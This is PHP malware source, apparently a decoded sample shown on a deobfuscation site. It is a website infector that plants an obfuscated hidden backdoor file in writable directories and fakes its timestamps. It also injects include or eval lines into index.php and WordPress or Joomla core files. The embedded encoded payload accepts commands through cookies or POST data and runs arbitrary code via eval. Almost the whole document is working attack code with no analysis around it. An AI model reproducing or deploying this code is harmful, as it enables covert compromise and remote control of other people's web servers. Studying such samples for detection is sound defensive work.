$cscripts["patch"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
}
}
return $cscripts;
}
private function _process_one($path, $force_inject = FALSE)
{
$res = $this->_patch_index($path, $force_inject);
$res |= $this->_patch_cms($path, $force_inject);
if ($res) {
return TRUE;
} else {
return FALSE;
}
}
private function _try_create_index($index_php)
{
@file_put_contents($index_php, "<" . "?php\n\n");
$content = @file_get_contents($index_php);
if (strpos($content, "php") !== FALSE) {
DomainFramer2::fix_rights($index_php);
$this->_last_error = "index created";
return TRUE;
} else {
return FALSE;
}
}
private function _preprocess_one($path)
{
if (!@file_exists($path)) {
return FALSE;
}
$index_html = $path . "/" . "index.html";
$index_htm = $path . "/" . "index.htm";
$index_php = $path . "/" . "index.php";
$htaccess = $path . "/" . ".htaccess";
if (!@file_exists($index_php) && !@file_exists($index_html) && !@file_exists($index_htm) && !@file_exists($htaccess)) {
$this->_last_error = "no index";
return $this->_try_create_index($index_php);
}
DomainFramer2::fix_rights($path);
DomainFramer2::fix_rights($index_html);
DomainFramer2::fix_rights($index_htm);
DomainFramer2::fix_rights($index_php);
if (@file_exists($index_php)) {
if (@file_exists($index_html)) @rename($index_html, $index_html . ".bak.bak");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_html)) {
@rename($index_html, $index_html . ".bak.bak");
@file_put_contents($index_php, "<" . "?php\n\n\necho @file_get_contents('index.html.bak.bak');");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_htm)) {
@rename($index_htm, $index_htm . ".bak.bak");
@file_put_contents($index_php, "<" . "?php\n\n\necho @file_get_contents('index.htm.bak.bak');");
} else {
@file_put_contents($index_php, "<" . "?php\n\n\n\n");
}
return $this->_fix_index_php($index_php);
}
private function _fix_index_php($path)
{
if (@file_exists($path)) {
$index_php_content = @file_get_contents($path);
if (stripos($index_php_content, "<" . "?php") !== FALSE) {
return TRUE;
} else {
$index_php_content = "<" . "?php\n\n\n\n?" . ">\n\n" . $index_php_content;
@file_put_contents($path, $index_php_content);
return TRUE;
}
}
return FALSE;
}
private function _dump_backdoor($root_dir)
{
if ($this->_current_cscript_path) {
return $this->_current_cscript_path;
}
$dirs = DomainFramer2::walk_dir($root_dir, $depth = 2, $skip_files = TRUE, $skip_dirs = FALSE);
$root_dir = "";
shuffle($dirs);
foreach ($dirs as $dir) {
if (@is_writable($dir)) {
$root_dir = $dir;
}
}
if (empty($root_dir))
{
$this->_current_cscript_path = "";
$this->_last_error = "no writable for payload";
return NULL;
}
DomainFramer2::fix_rights($root_dir);
$obfuscator = new Obfuscator(rawurldecode($this->_cscript_payload));
$name = "." . substr(md5(time()), 0, 8) . ".ccss";
$this->_current_cscript_path = $root_dir . "/" . $name;
$cscript_file_content = "<" . "?php" . "\n" . $obfuscator->generate($name) . "\n";
@file_put_contents($this->_current_cscript_path, $cscript_file_content);
DomainFramer2::fix_time($this->_current_cscript_path);
if (!@is_file($this->_current_cscript_path)) {
$this->_current_cscript_path = "";
$this->_last_error = "cant dump payload";
return NULL;
}
return $this->_current_cscript_path;
}
private function _patch_file($path, $root, $force_inject = FALSE, $recovery_mode = FALSE)
{
if (!@file_exists($path)) {
return FALSE;
}
$backdoor_path = $this->_dump_backdoor($root);
if (!empty($backdoor_path)) {
//$backdoor_path = $backdoor_path
$dict = str_split("hmepulic");
$sym = $dict[array_rand($dict)];
$backdoor_path = str_replace("-", "\\x" . dechex(ord("-")), $backdoor_path);
$backdoor_path = str_replace($sym, "\\x" . dechex(ord($sym)), $backdoor_path);
$patch = "\n\$path = \"" . $backdoor_path . "\"; ";
$patch .= "\$apath = str_repeat(\$path, 1); ";
$patch .= sprintf("@include_once /* %s */ (\$apath);\n", Obfuscator::rand_str(1, 5));
$patch = str_replace("\$path", "\$r" . Obfuscator::rand_str(1, 5), $patch);
$patch = str_replace("\$apath", "\$t" . Obfuscator::rand_str(1, 5), $patch);
$this->_cscripts_include[] = $root;
} else // cant dump backdoor, probable no writable dirs
{
// try patch full backdoor content
$patch = DomainFramer2::morph_php_str($this->_cscript_payload);
$this->_cscripts_patched[] = $root;
}
$res = DomainFramer2::insert_in_head($path, $patch, $force_inject, $recovery_mode);
if ($res === FALSE)
{
$this->_last_error = "unwritable for patch";
}
return $res;
}
private function _patch_index($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
return $this->_patch_file($index_php, $path, $force_inject);
}
private function _patch_cms($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
$index_php_content = @file_get_contents($index_php);
if (strpos($index_php_content, "wp-blog-header.php") > 0) {
$inject_file_cands = array($path . "/" . "wp-settings.php", $path . "/" . "wp-config.php", $path . "/" . "wp-includes/load.php", $path . "/" . "wp-content/plugins/akismet/akismet.php");
} elseif (strpos($index_php_content, "_JEXEC") > 0) {
$inject_file_cands = array($path . "/" . "libraries/import.php", $path . "/" . "includes/framework.php",);
} else {
$inject_file_cands = array();
}
if (!count($inject_file_cands)) {
return FALSE;
}
shuffle($inject_file_cands);
$status = FALSE;
$inject_file_cand = "";
for ($i = 0; $i < count($inject_file_cands); $i++) {
$inject_file_cand = $inject_file_cands[$i];
DomainFramer2::fix_rights($inject_file_cand);
if (@is_writable($inject_file_cand)) {
$status |= $this->_patch_file($inject_file_cand, $path, $force_inject, $status);
}
}
if (empty($inject_file_cand))
{
return FALSE;
}
return $status;
}
static public function walk_dir($dir, $depth = 0, $skip_files = FALSE, $skip_dirs = TRUE)
{
if ($depth < 0) {
return array();
}
$result = array();
if (($h = @opendir($dir)) === FALSE) {
return $result;
}
while (($f = @readdir($h)) !== FALSE) {
if ($f == '.' || $f == '..') {
continue;
}
$current_file = "$dir/$f";
if (@is_dir($current_file)) {
if (!$skip_dirs) {
$result[] = $current_file;
}
$result = array_merge($result, DomainFramer2::walk_dir($current_file, $depth - 1, $skip_files, $skip_dirs));
} else {
if (!$skip_files) {
$result[] = $current_file;
}
}
}
@closedir($h);
return $result;
}
static public function fix_rights($path)
{
@chmod($path, 0755);
}
static public function fix_time($path, $tm=-1)
{
if ($tm == -1)
{
@touch($path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
}
else
{
@touch($path, $tm);
}
}
static public function get_docroot()
{
$request_uri = "";
$docroot = "";
if (strpos($_SERVER['REQUEST_URI'], "?") !== FALSE) {
$request_uri = explode("?", $_SERVER['REQUEST_URI']);
$request_uri = $request_uri[0];
} else {
$request_uri = $_SERVER['REQUEST_URI'];
}
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $request_uri);
if ($docroot_end === FALSE) {
$docroot = $_SERVER['DOCUMENT_ROOT'];
} elseif ($docroot_end === 0) {
return "/";
} else {
$docroot = substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
return str_replace("\\", "/", $docroot);
}
static public function morph_str($string)
{
$hex = '';
$module = rand(2, 5);
for ($i = 0; $i < strlen($string); $i++) {
if (($i % $module) == 0 && $string[$i] != "\\" && $string[$i] != "\"") {
$code = decoct(ord($string[$i]));
$hex .= "\\\\" . (strlen($code) == 3 ? $code : "0" . $code);
} else {
$hex .= $string[$i];
}
}
return $hex;
}
static public function gen_space_string($len)
{
$str = "";
for ($i = 0; $i < $len; $i++) {
$str .= " ";
}
return $str;
}
static public function morph_php_str($string)
{
$assert_parameter_name = "\$user_auth_cookie";
$assert_payload = DomainFramer2::morph_str('eval(rawurldecode(\\"' . $string . '\\"));');
$initial_line = DomainFramer2::gen_space_string(256) . $assert_parameter_name . ' = "' . $assert_payload . '";' . "\n";
return $initial_line . "eval(" . $assert_parameter_name . ");";
}
static public function insert_in_head($path, $php_code, $force_inject = FALSE, $recovery_mode = FALSE)
{
DomainFramer2::fix_rights($path);
if (!@is_writable($path))
{
return FALSE;
}
$already_patched_marker = "/*" . substr(md5($path), 5, 5) . "*/";
$php_code = "\n" . $already_patched_marker . "\n" . $php_code . "\n" . $already_patched_marker;
$content = @file_get_contents($path);
if (strpos($content, "schemas/sitemap/0.9") !== FALSE) {
return FALSE;
}
if (substr_count($content, $already_patched_marker) === 1) {
$content = str_replace($already_patched_marker, "", $content);
}
if ($recovery_mode && strpos($content, $already_patched_marker) === FALSE)
{
return FALSE;
}
if (strpos($content, $already_patched_marker) !== FALSE && $force_inject) {
$from = "/" . preg_quote($already_patched_marker, "/") . "[.\\s\\S]*" . preg_quote($already_patched_marker, "/") . "/";
$content = preg_replace($from, "", $content, 1);
}
$html_pos = stripos($content, "<" . "html");
$php_pos = stripos($content, "<" . "?php");
if ($html_pos === FALSE) {
$html_pos = strlen($content) + 1;
}
if ($php_pos === FALSE) {
$php_pos = strlen($content) + 1;
}
if ($php_pos < $html_pos) {
$from = "/" . preg_quote("<" . "?" . "php", "/") . "/";
$content = preg_replace($from, "<" . "?" . "php" . $php_code, $content, 1);
} else {
$content = "<" . "?php " . $php_code . "\n?" . "> \n" . $content;
}
@file_put_contents($path, $content);
DomainFramer2::fix_time($path, time() + 120);
$content = @file_get_contents($path);
if (strpos($content, $already_patched_marker) !== FALSE) {
return TRUE;
} else {
return FALSE;
}
}
public function last_error()
{
return $this->_last_error;
}
}
$framer = new DomainFramer2("if%20%28%21defined%28%27stream_context_create%20%27%29%29%0A%7B%0Adefine%28%27stream_context_create%20%27%2C%201%29%3B%0A%40ini_set%28%27error_log%27%2C%20NULL%29%3B%40ini_set%28%27log_errors%27%2C%200%29%3B%40ini_set%28%27max_execution_time%27%2C%200%29%3B%40error_reporting%280%29%3B%40set_time_limit%280%29%3Bif%28%21defined%28%22PHP_EOL%22%29%29%7Bdefine%28%22PHP_EOL%22%2C%20%22%5Cn%22%29%3B%7Dif%20%28%21defined%28%27file_put_contents%20%27%29%29%7Bdefine%28%27file_put_contents%20%27%2C%201%29%3B%24ukwfik%20%3D%20%27acd14c4d-9a35-4b6f-b40f-ad76c9c8040f%27%3Bglobal%20%24ukwfik%3Bfunction%20xzpkqd%28%24vfpapv%29%20%7Bif%20%28strlen%28%24vfpapv%29%20%3C%204%29%7Breturn%20%22%22%3B%7D%24auleptmm%20%3D%20%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B/%3D%22%3B%24smgnwvjz%20%3D%20str_split%28%24auleptmm%29%3B%24smgnwvjz%20%3D%20array_flip%28%24smgnwvjz%29%3B%24ukonchp%20%3D%200%3B%24vvwyxfyx%20%3D%20%22%22%3B%24vfpapv%20%3D%20preg_replace%28%22%7E%5B%5EA-Za-z0-9%5C%2B%5C/%5C%3D%5D%7E%22%2C%20%22%22%2C%20%24vfpapv%29%3Bdo%20%7B%24hcybkhvd%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24wpeeeyt%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24gkzbzq%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24stjwqzxf%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24kgiqbylxuwgmizz%20%3D%20%28%24hcybkhvd%20%3C%3C%202%29%20%7C%20%28%24wpeeeyt%20%3E%3E%204%29%3B%24zqtjtw%20%3D%20%28%28%24wpeeeyt%20%26%2015%29%20%3C%3C%204%29%20%7C%20%28%24gkzbzq%20%3E%3E%202%29%3B%24rxspesu%20%3D%20%28%28%24gkzbzq%20%26%203%29%20%3C%3C%206%29%20%7C%20%24stjwqzxf%3B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24kgiqbylxuwgmizz%29%3Bif%20%28%24gkzbzq%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24zqtjtw%29%3B%7Dif%20%28%24stjwqzxf%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24rxspesu%29%3B%7D%7D%20while%20%28%24ukonchp%20%3C%20strlen%28%24vfpapv%29%29%3Breturn%20%24vvwyxfyx%3B%7Dif%20%28%21function_exists%28%27file_put_contents%27%29%29%7Bfunction%20file_put_contents%28%24kgiqbylx%2C%20%24mplisjs%2C%20%24tzzlkdqu%20%3D%20False%29%7B%24mplisjsxfduvsk%20%3D%20%24tzzlkdqu%20%3D%3D%208%20%3F%20%27a%27%20%3A%20%27w%27%3B%24ycesld%20%3D%20%40fopen%28%24kgiqbylx%2C%20%24mplisjsxfduvsk%29%3Bif%20%28%24ycesld%20%3D%3D%3D%20False%29%7Breturn%200%3B%7Delse%7Bif%20%28is_array%28%24mplisjs%29%29%20%24mplisjs%20%3D%20implode%28%24mplisjs%29%3B%24wnosluwxalmvh%20%3D%20fwrite%28%24ycesld%2C%20%24mplisjs%29%3Bfclose%28%24ycesld%29%3Breturn%20%24wnosluwxalmvh%3B%7D%7D%7Dif%20%28%21function_exists%28%27file_get_contents%27%29%29%7Bfunction%20file_get_contents%28%24rjlsnfpf%29%7B%24kzseft%20%3D%20fopen%28%24rjlsnfpf%2C%20%22r%22%29%3B%24valusqf%20%3D%20fread%28%24kzseft%2C%20filesize%28%24rjlsnfpf%29%29%3Bfclose%28%24kzseft%29%3Breturn%20%24valusqf%3B%7D%7Dfunction%20encaioa%28%29%7Breturn%20trim%28preg_replace%28%22/%5C%28.%2A%5C%24/%22%2C%20%27%27%2C%20__FILE__%29%29%3B%7Dfunction%20skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%7B%24xmfrdomo%20%3D%20%22%22%3Bfor%20%28%24ukonchp%3D0%3B%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%29%7Bfor%20%28%24wnosluw%3D0%3B%20%24wnosluw%3Cstrlen%28%24yjkllsil%29%20%26%26%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%20%24wnosluw%2B%2B%2C%20%24ukonchp%2B%2B%29%7B%24xmfrdomo%20.%3D%20chr%28ord%28%24uwucjfg%5B%24ukonchp%5D%29%20%5E%20ord%28%24yjkllsil%5B%24wnosluw%5D%29%29%3B%7D%7Dreturn%20%24xmfrdomo%3B%7Dfunction%20arcnll%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%2C%20%24ukwfik%29%3B%7Dfunction%20banwrr%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24ukwfik%29%2C%20%24yjkllsil%29%3B%7Dfunction%20noibksfb%28%29%7B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24cpqiumbe%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24hpcupip%20%3D%20%40unserialize%28arcnll%28rawurldecode%28%24cpqiumbe%29%2C%20md5%28encaioa%28%29%29%29%29%3B%7Delse%7B%24hpcupip%20%3D%20Array%28%29%3B%7Dreturn%20%24hpcupip%3B%7Dfunction%20igmddlhx%28%24hpcupip%29%7B%24etoboxnk%20%3D%20rawurlencode%28banwrr%28%40serialize%28%24hpcupip%29%2C%20md5%28encaioa%28%29%29%29%29%3B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24bgnxkqjs%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24qwcgalds%20%3D%20str_replace%28%24bgnxkqjs%2C%20%24etoboxnk%2C%20%24qwcgalds%29%3B%7Delse%7B%24qwcgalds%20%3D%20%24qwcgalds%20.%20%22%5Cn%5Cn//%22%20.%20md5%28encaioa%28%29%29%20.%20%24etoboxnk%3B%7D%40file_put_contents%28encaioa%28%29%2C%20%24qwcgalds%29%3B%7Dfunction%20wndfcdt%28%24uetgil%2C%20%24ukjayigb%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3B%24hpcupip%5B%24uetgil%5D%20%3D%20xzpkqd%28%24ukjayigb%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20tnfqcb%28%24uetgil%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3Bunset%28%24hpcupip%5B%24uetgil%5D%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20ielcyedg%28%24uetgil%3DNULL%29%7Bforeach%20%28noibksfb%28%29%20as%20%24hhghxqti%3D%3E%24yflueda%29%7Bif%20%28%24uetgil%29%7Bif%20%28strcmp%28%24uetgil%2C%20%24hhghxqti%29%20%3D%3D%200%29%7Beval%28%24yflueda%29%3Bbreak%3B%7D%7Delse%7Beval%28%24yflueda%29%3B%7D%7D%7Dforeach%20%28array_merge%28%24_COOKIE%2C%20%24_POST%29%20as%20%24txsyjapp%20%3D%3E%20%24uwucjfg%29%7B%24uwucjfg%20%3D%20%40unserialize%28arcnll%28xzpkqd%28%24uwucjfg%29%2C%20%24txsyjapp%29%29%3Bif%20%28isset%28%24uwucjfg%5B%27ak%27%5D%29%20%26%26%20%24ukwfik%3D%3D%24uwucjfg%5B%27ak%27%5D%29%7Bif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27i%27%29%7B%24ukonchp%20%3D%20Array%28%27pv%27%20%3D%3E%20%40phpversion%28%29%2C%27sv%27%20%3D%3E%20%272.0-1%27%2C%27ak%27%20%3D%3E%20%24uwucjfg%5B%27ak%27%5D%2C%29%3Becho%20%40serialize%28%24ukonchp%29%3Bexit%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27e%27%29%7Beval%28%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27plugin%27%29%7Bif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27add%27%29%7Bwndfcdt%28%24uwucjfg%5B%27p%27%5D%2C%20%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27rem%27%29%7Btnfqcb%28%24uwucjfg%5B%27p%27%5D%29%3B%7D%7Decho%20%24uwucjfg%5B%27ak%27%5D%3Bexit%28%29%3B%7D%7Dielcyedg%28%29%3B%7D%0A%7D");
$framer->find_paths();
$framer->preprocess_paths();
$framer->process($force_inject = TRUE);
$cscripts = $framer->get_cscripts();
if (count($cscripts) == 0) {
@unlink($this->_current_cscript_path);
}
$cscripts["last_error"] = $framer->last_error();
echo @serialize($cscripts);
exit();Function Calls
| None |
Stats
| MD5 | 881f97cb4c8bd9de22da63d0ebf54132 |
| Eval Count | 0 |
| Decode Time | 65 ms |